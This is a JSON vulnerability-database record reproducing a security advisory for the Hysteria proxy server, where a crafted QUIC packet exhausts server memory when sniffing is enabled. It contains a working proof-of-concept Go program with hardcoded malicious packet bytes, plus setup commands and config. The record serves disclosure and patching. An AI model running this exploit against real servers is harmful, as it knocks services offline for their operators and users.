{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95454?format=json","vulnerability_id":"VCID-6cnz-m8hk-myek","summary":"Hysteria: A specially constructed quic package can crash the server OOM when the sniff is enabled\n### Summary\n\nA specially constructed quic package can crash the server OOM when the sniff is enabled.\n\n### Details\n\nWhen the server has sniff enabled, a valid connection can request the server to forward UDP traffic and construct a huge crypto length. The server will allocate memory according to this length, causing an OOM.\n\n\n### PoC\n```\nopenssl req -x509 -newkey rsa:2048 -nodes -keyout localhost.key -out localhost.crt -days 365 -subj \"/CN=localhost\" 2>/dev/null\n```\n\nserver.yaml\n```\nlisten: :8443\ntls:\n cert: localhost.crt\n key: localhost.key\nauth:\n type: password\n password: mypassword\nsniff:\n enable: true\noutbounds:\n - name: my_direct\n type: direct\n default: true\n```\n\npoc.go\n\n```\npackage main\n\nimport (\n\t\"flag\"\n\t\"fmt\"\n\t\"log\"\n\t\"net\"\n\t\"time\"\n\n\t\"github.com/apernet/hysteria/core/v2/client\"\n)\n\nfunc main() {\n\tserverAddrStr := flag.String(\"server\", \"127.0.0.1:8443\", \"Hysteria server address\")\n\tpassword := flag.String(\"password\", \"mypassword\", \"Hysteria server password\")\n\tflag.Parse()\n\n\tserverAddr, _ := net.ResolveUDPAddr(\"udp\", *serverAddrStr)\n\tc, _, err := client.NewClient(&client.Config{\n\t\tServerAddr: serverAddr, Auth: *password, TLSConfig: client.TLSConfig{InsecureSkipVerify: true},\n\t})\n\tif err != nil {\n\t\tlog.Fatalf(\"Failed to connect: %v\", err)\n\t}\n\tdefer c.Close()\n \n\tvar maliciousQUICPacket = []byte{ \n\t\t0xcb, 0x0, 0x0, 0x0, 0x1, 0x8, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x0, 0x0, \n\t\t0x32, 0x1d, 0xa8, 0xd6, 0x3c, 0x51, 0x24, 0xb7, 0xbe, 0xf2, 0x91, 0x77, 0x1c, 0x9d, 0x66, \n\t\t0xfc, 0xab, 0x91, 0x1e, 0xaf, 0xf9, 0x14, 0xd5, 0xec, 0xb0, 0x74, 0x46, 0x4f, 0x4, 0x70, \n\t\t0x18, 0x35, 0x31, 0xc5, 0xea, 0x36, 0x40, 0x36, 0x65, 0xdf, 0xa4, 0xcc, 0xf9, 0xff, 0x65, \n\t\t0xe5, 0x1d, 0xb7, 0xc5, 0xc2, 0xc2, \n\t} \n\n\tudpConn, err := c.UDP()\n\tif err != nil {\n\t\tfmt.Printf(\"[-] UDP error: %v\\n\", err)\n\t}\n\ttargetAddr := fmt.Sprintf(\"8.8.8.8:443\")\n\tfmt.Printf(\"[*] Sending 'death' packet to %s...\\n\", targetAddr)\n\t_ = udpConn.Send(maliciousQUICPacket, targetAddr)\n\n\t// Wait longer to ensure packet delivery\n\ttime.Sleep(3 * time.Second)\n\tfmt.Printf(\"[+] Done.\\n\")\n}\n```\n\n\n### Impact\nWhen sniffing is enabled on the server, a user with a valid password can launch an attack that could cause the server to run out of memory (OOM).","aliases":[{"alias":"GHSA-9fw6-xgg2-mq9q"}],"fixed_packages":[],"affected_packages":[],"references":[{"reference_url":"https://github.com/apernet/hysteria","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apernet/hysteria"},{"reference_url":"https://github.com/apernet/hysteria/security/advisories/GHSA-9fw6-xgg2-mq9q","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apernet/hysteria/security/advisories/GHSA-9fw6-xgg2-mq9q"}],"weaknesses":[{"cwe_id":770,"name":"Allocation of Resources Without Limits or Throttling","description":"The product allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor."}],"exploits":[],"severity_range_score":"7.0 - 8.9","exploitability":null,"weighted_severity":null,"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6cnz-m8hk-myek"}